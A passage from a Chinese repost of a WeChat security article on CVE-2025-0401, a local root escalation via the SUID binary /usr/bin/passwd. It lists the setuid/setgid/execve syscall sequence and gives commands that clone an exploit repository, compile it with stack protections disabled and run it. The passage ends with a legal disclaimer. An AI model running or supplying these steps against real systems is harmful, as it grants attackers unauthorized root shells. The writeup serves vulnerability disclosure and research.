/usr/bin/passwd
,当与特定系统调用序列结合使用时,允许意外的 root 级访问。此漏洞展示了攻击者如何利用 SUID 错误配置来模拟 root shell 访问。该漏洞是通过涉及以下方面的直接系统调用触发的:
setuid(0)
setgid(0)
- 执行
/bin/sh
系统调用:
write
(1)setuid
(105)setgid
(106)execve
(59)exit
(60)
git clone https://github.com/CyberSecurityUP/CVE-2025-0401.git
cd CVE-2025-0401
gcc -z execstack -fno-stack-protector exploit.c -o exploit
chmod +x exploit
./exploit
原文始发于微信公众号(TtTeam):CVE-2025-0401 - 通过 SUID 二进制滥用实现本地权限提升
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论